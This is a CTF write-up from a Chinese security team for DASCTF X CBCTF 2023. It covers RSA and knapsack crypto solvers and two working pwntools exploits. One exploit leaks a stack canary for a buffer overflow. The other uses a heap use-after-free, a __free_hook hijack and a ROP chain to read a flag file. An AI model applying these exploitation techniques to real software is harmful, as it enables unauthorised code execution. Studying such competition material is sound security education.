DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC



01

Crypto

1

ezrsa

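#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time    : 2023/10/21 11:31
"""Solve script for the DASCTF X CBCTF 2023 "ezrsa" challenge.

Stage 1 -- recover the plaintext shared by two ciphertexts under n2.
    c1 = (m + noise1)^e1 mod n2 and c2 = (m + noise2)^e2 mod n2 encrypt
    linearly related plaintexts under the same modulus, so m is a common
    root of g1 = (x + noise1)^e1 - c1 and g2 = (x + noise2)^e2 - c2 in
    Z/n2[x].  Their polynomial GCD is the linear factor (x - m), and m is
    read off its constant term (Franklin-Reiter related-message attack).

Stage 2 -- rebuild q from enc.txt and decrypt `enc`.
    Every line of enc.txt that parses as an integer contributes one bit of
    q: 1 if its Jacobi symbol with respect to n1 is +1, else 0, first line
    = least significant bit.  The hard-coded p together with q gives the
    RSA modulus p*q under which `enc` is decrypted with e = 65537.

Requires SageMath (PolynomialRing, Zmod, jacobi_symbol), gmpy2 and
pycryptodome; enc.txt is read from the working directory.

Transcription note: the published listing had lost its backslashes
(split("n") for split("\\n")); splitlines() is used instead, which also
tolerates CRLF line endings.
"""
import binascii  # unused, kept from the original script
import gmpy2
from Crypto.Util.number import long_to_bytes
from sage.all import *

n1 = 65634094430927080732256164808833233563732628654160389042977689628512527168256899310662239009610512772020503283842588142453533499954947692968978190310627721338357432052800695091789711809256924541784954080619073213358228083200846540676931341013554634493581962527475555869292091755676130810562421465063412235309
n2 = 103670293685965841863872863719573676572683187403862749665555450164387906552249974071743238931253290278574192713467491802940810851806104430306195931179902098180199167945649526235613636163362672777298968943319216325949503045377100235181706964846408396946496139224344270391027205106691880999410424150216806861393
(e1, noise1, c1) = (1743, 44560588075773853612820227436439937514195680734214431948441190347878274184937952381785302837541202705212687700521129385632776241537669208088777729355349833215443048466316517110778502508209433792603420158786772339233397583637570006255153020675167597396958251208681121668808253767520416175569161674463861719776, 65643009354198075182587766550521107063140340983433852821580802983736094225036497335607400197479623208915379722646955329855681601551282788854644359967909570360251550766970054185510197999091645907461580987639650262519866292285164258262387411847857812391136042309550813795587776534035784065962779853621152905983)
(e2, noise2, c2) = (1325, 35282006599813744140721262875292395887558561517759721467291789696459426702600397172655624765281531167221787036009507833425145071265739486735993631460189629709591456017092661028839951392247601628468621576100035700437892164435424035004463142959219067199451575338270613300215815894328788753564798153516122567683, 50327632090778183759544755226710110702046850880299488259739672542025916422119065179822210884622225945376465802069464782311211031263046593145733701591371950349735709553105217501410716570601397725812709771348772095131473415552527749452347866778401205442409443726952960806789526845194216490544108773715759733714)
enc = 124349762993424531697403299350944207725577290992189948388824124986066269514204313888980321088629462472088631052329128042837153718129149149661961926557818023704330462282009415874674794190206220980118413541269327644472633791532767765585035518183177197863522573410860341245613331398610013697803459403446614221369


def attack(c1, c2, e1, e2, noise1, noise2, n2):
    """Return the common plaintext m of two related-message RSA ciphertexts.

    g1 and g2 share the factor (x - m) in Z/n2[x]; a Euclidean GCD on the
    two polynomials recovers it.  The GCD is made monic, so it is exactly
    x - m and its constant term is -m.
    """
    PR = PolynomialRing(Zmod(n2), name='x')
    x = PR.gen()
    g1 = (x + noise1) ** e1 - c1
    g2 = (x + noise2) ** e2 - c2

    def gcd(a, b):
        # Hand-rolled Euclid: n2 is composite, so Z/n2 is not a field and the
        # generic polynomial gcd is not available.  A step only fails if a
        # leading coefficient is not invertible mod n2, which would itself
        # reveal a factor of n2.
        while b:
            a, b = b, a % b
        return a.monic()

    return -gcd(g1, g2)[0]


m1 = attack(c1, c2, e1, e2, noise1, noise2, n2)
print(m1)

# p is hard-coded from the author's run; presumably it is the m1 printed
# above (both are ~512-bit) -- TODO confirm before reusing this script.
p = 13189337905641321257372188436353844418280745284875462357019668708167547026960641869513283218672677712590326347601424108528959315675307896082223561007980457

with open("enc.txt", "r") as f:
    lines = f.read().splitlines()

# Keep every line that parses as an integer; blank / non-numeric lines are
# skipped on purpose (same best-effort behaviour as the original script).
c = []
for t in lines:
    try:
        c.append(int(t))
    except ValueError:
        pass

# One bit of q per ciphertext: Jacobi symbol +1 -> '1', anything else -> '0'.
bits = "".join("1" if jacobi_symbol(s, n1) == 1 else "0" for s in c)
q = int(bits[::-1], 2)  # the first line of enc.txt is the least significant bit
print(q)

modulus = p * q
phi = (p - 1) * (q - 1)
d = int(gmpy2.invert(65537, phi))
print(d)
m = pow(enc, d, modulus)
print(long_to_bytes(m))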

2

CBbackpack

每6位一组,一共8组,一共48位

每组0,1各有3个,一共有$C^3_6$=20种可能

利用中间相遇攻击爆破:把 8 组分成前后各 4 组,每一半只有 $20^4 = 160000$ 种部分和;先把后一半的“目标值减部分和”存成查找表,再遍历前一半查表即可找到匹配,复杂度从 $20^8$ 降到约 $2 \times 20^4$。

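"""Solve script for the DASCTF X CBCTF 2023 "CBbackpack" challenge.

The 48 public weights form 8 groups of 6.  Exactly 3 of the 6 bits in each
group are set, so a group has C(6,3) = 20 possible partial sums and the
secret has 20^8 candidates.  A meet-in-the-middle search splits the groups
into two halves of 20^4 = 160000 combinations each: the right half is
indexed in a dict by (target - partial sum) and the left half is scanned
for a match with O(1) lookups.  The recovered 0/1 string is hashed with
SHA-256 to form the flag.

The original script tested `llll1[i] in llll2` against a 160000-element
list inside a 160000-iteration loop (accidentally quadratic) and resumed
from index 36600 once the match at 36690 was known; the dict lookup makes
the full scan fast, so no resume offset is needed.
"""
import hashlib
import itertools

# Public knapsack weights (8 groups x 6) and the target subset sum.
l = [65651991706497, 247831871690373, 120247087605020, 236854536567393, 38795708921144, 256334857906663,
     120089773523233, 165349388120302, 123968326805899, 79638234559694, 259559389823590, 256776519514651,
     107733244474073, 216508566448440, 39327578905012, 118682486932022, 263357223061004, 132872609024098,
     44605761726563, 24908360451602, 237906955893793, 204469770496199, 7055254513808, 221802659519968,
     169686619990988, 23128789035141, 208847144870760, 272339624469135, 269511404473473, 112830627321371,
     73203551744776, 42843503010671, 118193938825623, 49625220390324, 230439888723036, 241486656550572,
     107149406378865, 233503862264755, 269502011971514, 181805192674559, 152612003195556, 184127512098087,
     165959151027513, 188723045133473, 241615906682300, 216101484550038, 81190147709444, 124498742419309]
x = 4051501228761632

GROUP_SIZE = 6
ONES_PER_GROUP = 3


def group_sums(weights, group_size=GROUP_SIZE, ones=ONES_PER_GROUP):
    """Return, per group of `group_size` weights, the sums of all `ones`-subsets.

    Subsets are enumerated in itertools.combinations order, so an index into
    a group's list identifies one specific choice of positions (decoded by
    indices_to_bits with the same ordering).
    """
    groups = [weights[i:i + group_size] for i in range(0, len(weights), group_size)]
    return [[sum(combo) for combo in itertools.combinations(g, ones)] for g in groups]


def meet_in_the_middle(sums_per_group, target):
    """Return one tuple of per-group subset indices whose sums add up to target.

    The groups are split in half.  The right half's sums go into a dict keyed
    by their complement (target - sum), keeping the first index for duplicate
    values (as list.index did); the left half is then scanned for a key hit.

    Raises:
        ValueError: no combination of subsets reaches the target.
    """
    half = len(sums_per_group) // 2
    left, right = sums_per_group[:half], sums_per_group[half:]

    complements = {}
    for idxs in itertools.product(*(range(len(g)) for g in right)):
        total = sum(g[i] for g, i in zip(right, idxs))
        complements.setdefault(target - total, idxs)

    for idxs in itertools.product(*(range(len(g)) for g in left)):
        total = sum(g[i] for g, i in zip(left, idxs))
        if total in complements:
            return idxs + complements[total]
    raise ValueError("no subset of the weights sums to the target")


def indices_to_bits(idxs, group_size=GROUP_SIZE, ones=ONES_PER_GROUP):
    """Expand per-group combination indices into the flat 0/1 selection vector."""
    combos = list(itertools.combinations(range(group_size), ones))
    bits = []
    for k in idxs:
        block = [0] * group_size
        for pos in combos[k]:
            block[pos] = 1
        bits.extend(block)
    return bits


def solve_backpack(weights, target, group_size=GROUP_SIZE, ones=ONES_PER_GROUP):
    """Recover the 0/1 vector (exactly `ones` per group) whose weights sum to target.

    Raises:
        ValueError: no solution exists, or the decoded vector does not
            reproduce the target (internal consistency check).
    """
    sums = group_sums(weights, group_size, ones)
    idxs = meet_in_the_middle(sums, target)
    bits = indices_to_bits(idxs, group_size, ones)
    if sum(w for w, b in zip(weights, bits) if b) != target:
        raise ValueError("decoded bits do not reproduce the target")
    return bits


def make_flag(bits):
    """Build DASCTF{sha256(bit string written as '0'/'1' characters)}."""
    digest = hashlib.sha256("".join(str(b) for b in bits).encode()).hexdigest()
    return "DASCTF{" + digest + "}"


if __name__ == "__main__":
    print(make_flag(solve_backpack(l, x)))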

02

Pwn

1

Guestbook

先用 24 字节填满 name 缓冲区,程序回显 name 时会把紧随其后的 8 字节(canary)一并打印出来;拿到 canary 后,在后续输入处栈溢出,带着正确的 canary 覆盖返回地址到 0x4012c0。

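"""Exploit for the DASCTF X CBCTF 2023 pwn challenge "Guestbook".

Flow: the name field is filled with 24 bytes; the program echoes the name,
and the 8 bytes that follow it are read back as the stack canary.  The
later input then overflows the stack with that canary in place and a
return address of 0x4012c0.

Transcription note: the published listing had lost every backslash, so
escape sequences such as b'\\x7f' and b'\\x00' are restored here.
"""
from pwn import *
# from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
# context.terminal = ['tmux', 'splitw', '-h']
filename = './GuestBook'
debug = 0
ip = 'node4.buuoj.cn'
port = 26998

if debug:
    p = process(filename)
else:
    p = remote(ip, port)

# Short aliases for the tube I/O used throughout.
ru = lambda a: p.recvuntil(a)
r = lambda n: p.recv(n)
sla = lambda a, b: p.sendlineafter(a, b)
sa = lambda a, b: p.sendafter(a, b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
# Pointer leak helpers: read up to the high byte that userland pointers end
# with (0xf7 on i386 libc, 0x7f on x86-64) and unpack the trailing bytes.
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))


def inter():
    """Hand the connection over to the user."""
    p.interactive()


def debu(cmd=''):
    """Attach gdb with optional commands and pause (local debugging only)."""
    gdb.attach(p, cmd)
    pause()


def get_addr():
    """Read a 6-byte little-endian x86-64 pointer whose top byte is 0x7f."""
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))


def get_sysbin(libc_base, libc):
    """Return (system, "/bin/sh") addresses for a libc loaded at libc_base."""
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))


def csu(rdi, rsi, rdx, rip, gadget):
    """ret2csu-style frame: rbx=0, rbp=1, then the call-target pointer and the
    three argument registers, re-entering at gadget-0x1a.  Not used below."""
    return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)


# --- leak the canary --------------------------------------------------------
# 24 bytes of filler; the echo of the name is followed by the 8 bytes after
# the buffer, which are taken as the canary.
sla(b'name: ', b'a' * 24)
ru(b'a' * 24)
canary = u64(r(0x8))
print("canary :", hex(canary))
# debu('b *0x40143f')

# --- overflow ---------------------------------------------------------------
sla(b'leave(MAX 4): ', b'4')
for i in range(2):
    sl(b'aaaa')
# NOTE(review): the +0x6 correction on the leaked canary is not explained in
# the writeup -- verify against the binary (the leak may have clobbered a
# byte of the real canary) before reusing this offset.
payload = b'b' * (0x38 + 0x20) + p64(canary + 0x6) + b'c' * 0x8 + p64(0x00000000004012c0)
sl(payload)
sl(b'b' * 0x38 + b'\x00')
inter()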

2

EASYBOX

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

3

Binding

这一题在比赛期间没有做出来,非常可惜,感觉最后就差一点点,就是临门一脚的事情,所以赛后又花了点时间仔细看了看这道题,花了一个多小时就出了,难度算比较中等水平,主要是中间卡了很长一段时间。

这一题漏洞也非常简单,一是UAF 漏洞。

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

二是存在任意地址写,但只能写一次,每次只能写 1 个字节,并且会把高 7 字节覆写为 \x00。

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

基本思路就是:

1.通过UAF漏洞来泄露 libc 的基地址,接着得到 environ 地址以此泄露栈地址,然后通过栈地址来泄露出 ELF 基地址。(一开始是尝试通过 environ+0x20 来泄露出 ELF 基地址,但是打印会被截断,寄 ),show 函数来泄露堆地址。

2.通过edit 函数修改EDIT_TIME为0xff,使得可以任意次数修改。

3.在栈上构造ORW的ROP链。(当时快结束时,已经做完这一步,但是main居然没有正常返回,然后无了)

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

4.最后把 __free_hook 改成 magic gadget(mov rdx, [rdi+8]; mov [rsp], rax; call [rdx+0x20]):free 被劫持后 rdi 指向被释放的堆块,gadget 让 rdx 指回该堆块并调用其 +0x20 处预先放好的 setcontext+0x3d,setcontext 再从堆块 +0xa0/+0xa8 取出 rsp/rip,从而跳转到栈上构造的 ROP 链。

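"""Exploit for the DASCTF X CBCTF 2023 pwn challenge "Binding" (glibc 2.31).

Primitives (per the writeup): a use-after-free (freed chunks can still be
shown/edited) and a one-shot arbitrary write of a single byte that zeroes
the other seven bytes of the target qword.

Chain used below:
  1. Allocate and free chunks so show() on a freed chunk leaks a libc
     pointer; redirect a freed chunk's pointer so show() reads environ
     (stack address) and then a stack slot holding a program address (ELF
     base); show(0xb, '1') leaks a heap pointer.
  2. Use the byte write on EDIT_TIME (elf_base+0x4010) to set it to 0xff so
     edit() can be called as often as needed.
  3. Write an open/read/write/exit ROP chain onto the stack, one byte per
     edit() call.
  4. Point __free_hook at a gadget (mov rdx,[rdi+8]; mov [rsp],rax;
     call [rdx+0x20]).  free() of a chunk whose data holds a pointer to
     itself at +8 and setcontext+0x3d at +0x20 makes setcontext load rsp/rip
     from the chunk (+0xa0/+0xa8) and pivot into the stack ROP chain.

Transcription note: the published listing had lost every backslash; escape
sequences such as b'\\x7f', b'\\x00' and the '\\n' in the edit prompts are
restored here.
"""
from pwn import *
# from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
# context.terminal = ['tmux', 'splitw', '-h']
filename = './binding'
debug = 0
ip = '127.0.0.1'
port = 9999
libc = ELF('/home/roach/glibc-patcher/libs/amd64/2.31-0ubuntu9.9_amd64/libc.so.6')

if debug:
    p = process(filename)
else:
    p = remote(ip, port)

# Short aliases for the tube I/O used throughout.
ru = lambda a: p.recvuntil(a)
r = lambda n: p.recv(n)
sla = lambda a, b: p.sendlineafter(a, b)
sa = lambda a, b: p.sendafter(a, b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
# Pointer leak helpers: read up to the high byte that userland pointers end
# with (0xf7 on i386 libc, 0x7f on x86-64) and unpack the trailing bytes.
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))


def inter():
    """Hand the connection over to the user."""
    p.interactive()


def debu(cmd=''):
    """Attach gdb with optional commands and pause (local debugging only)."""
    gdb.attach(p, cmd)
    pause()


def get_addr():
    """Read a 6-byte little-endian x86-64 pointer whose top byte is 0x7f."""
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))


def get_sysbin(libc_base, libc):
    """Return (system, "/bin/sh") addresses for a libc loaded at libc_base."""
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))


def csu(rdi, rsi, rdx, rip, gadget):
    """ret2csu-style frame: rbx=0, rbp=1, then the call-target pointer and the
    three argument registers, re-entering at gadget-0x1a.  Not used below."""
    return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)


# --- menu wrappers ----------------------------------------------------------
def add(idx, size, content):
    """Menu 1: allocate slot `idx` with `size` bytes and write `content`."""
    sla(b'choice:', b'1')
    sla(b'Idx:', str(idx).encode())
    sla(b'Size:', str(size).encode())
    sa(b'Content:', content)


def edit(idx, content1, content2):
    """Menu 2: the byte write.  As used below, content1 is the packed target
    address and content2 the packed value (only its first byte lands)."""
    sla(b'choice:', b'2')
    sla(b'Idx:', str(idx).encode())
    sa(b'context1: \n', content1)
    sa(b'context2: \n', content2)


def show(idx, choice):
    """Menu 3: print slot `idx`; `choice` selects which field is printed."""
    sla(b'choice:', b'3')
    sla(b'choice:', choice)
    sla(b'Idx:', str(idx).encode())


def delete(idx):
    """Menu 4: free slot `idx` (the slot stays reachable afterwards -- UAF)."""
    sla(b'choice:', b'4')
    sla(b'Idx:', str(idx).encode())


# --- stage 1: leaks ---------------------------------------------------------
for i in range(0xb):
    add(i, 0x150, b'a' * 8)
for i in range(0x8):
    delete(i)
# Slot 7 is freed but still readable; the value it prints is offset
# 0x1ecbe0 from libc base (presumably a main_arena pointer left by free).
show(7, b'0')
ru(b'context: ')
leak = get_addr()
print("leak : ", hex(leak))
libc_base = leak - 0x1ecbe0
print("libc_base : ", hex(libc_base))

stack_addr = libc_base + libc.sym['environ']
print("stack  address : ", hex(stack_addr))

# The tail of this 0x1e0 allocation overlaps the record show(7) reads from;
# its last qword becomes the pointer show(7) dereferences (presumably slot
# 7's data pointer -- verify the layout in gdb).  Reading environ gives a
# stack address.
payload = b'a' * (0x150 + 0x8) + p64(0x110) + p64(stack_addr)
add(0xb, 0x1e0, payload)
show(7, b'0')
ru(b'context: ')
stack = get_addr() - 0x100
print("stack : ", hex(stack))

# Same trick on slot 8 to read a stack slot that holds a program address.
delete(8)
payload = b'a' * (0x1d0 + 0x8) + p64(0x110) + p64(stack - 0x20)
add(0xc, 0x200, payload)
show(8, b'0')
ru(b'context: ')
elf_base = u64(r(6).ljust(8, b'\x00')) - 0x1990
print("elf_base : ", hex(elf_base))
# debu('b show')

# Field '1' of slot 0xb prints a heap pointer after a 9-byte prefix.
show(0xb, b'1')
r(9)
heap = u64(r(6).ljust(8, b'\x00'))
print("heap : ", hex(heap))

# --- stage 2: lift the single-write limit ----------------------------------
# EDIT_TIME lives at elf_base+0x4010; setting it to 0xff allows many edits.
edit(9, p64(elf_base + 0x4010), p64(0xff))

# --- stage 3: open/read/write/exit ROP chain on the stack -------------------
pop_rdi = elf_base + 0x0000000000001a13
pop_rsi = libc_base + 0x000000000002601f
pop_rdx = libc_base + 0x0000000000142c92
openfile = libc_base + libc.sym['open']
readfile = libc_base + libc.sym['read']
writefile = libc_base + libc.sym['write']
exits = libc_base + libc.sym['exit']

# setcontext lands on pop_rdi with rsp = stack, so the first qword becomes
# rdi: heap+0xbf0 is where "./flag" sits inside payload2 (chunk data at
# heap+0xbe0, +0x10).  The read/write use fd 3, i.e. open() is assumed to
# return the first free descriptor.
payload = p64(heap + 0xbf0) + p64(pop_rsi) + p64(0x0) + p64(openfile)
payload += p64(pop_rdi) + p64(0x3) + p64(pop_rsi) + p64(heap) + p64(pop_rdx) + p64(0x100) + p64(readfile)
payload += p64(pop_rdi) + p64(0x1) + p64(pop_rsi) + p64(heap) + p64(pop_rdx) + p64(0x100) + p64(writefile)
payload += p64(pop_rdi) + p64(0x0) + p64(exits)

# Gadget installed in __free_hook:
#   0x0000000000151990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]

# One byte per edit() call.
for i in range(len(payload)):
    edit(9, p64(stack + i), payload[i:i + 1].ljust(8, b'\x00'))

free_hook = libc_base + libc.sym['__free_hook']
setcontext = libc_base + libc.sym['setcontext'] + 0x3d
magic_gadgets = libc_base + 0x0000000000151990
# debu('b *$rebase(0x16a0)')
for i in range(8):
    edit(9, p64(free_hook + i), p64(magic_gadgets)[i:i + 1].ljust(8, b'\x00'))

# --- stage 4: fake frame in the chunk that gets freed -----------------------
# original note: 0xe -> address = heap+0xbe0  (the slot is added as 0xd below)
# Layout relative to the chunk data, which is rdi when __free_hook runs:
#   +0x08  pointer back to the chunk (the gadget loads it into rdx)
#   +0x10  "./flag\0\0"   (open() path, heap+0xbf0)
#   +0x20  setcontext+0x3d (the gadget's call target)
#   +0xa0  rsp, +0xa8 rcx/rip consumed by setcontext -> pivot into the chain
payload2 = p64(0x0) + p64(heap + 0xbe0) + b'./flag\x00\x00' + p64(0x0) + p64(setcontext)
payload2 = payload2.ljust(0xa0, b'\x00')
payload2 = payload2 + p64(stack) + p64(pop_rdi)
add(0xd, 0x150, payload2)

print("setcontext : ", hex(setcontext))
print("magic gadgets :", hex(magic_gadgets))
print("free hook :", hex(free_hook))
print("libc_base : ", hex(libc_base))
print("stack : ", hex(stack))
print("elf_base : ", hex(elf_base))
print("heap : ", hex(heap))
# debu()
delete(0xd)  # free() -> __free_hook -> gadget -> setcontext+0x3d -> ROP chain
inter()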

原文始发于微信公众号(EDI安全):DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEChttp://cn-sec.com/archives/2197498.html
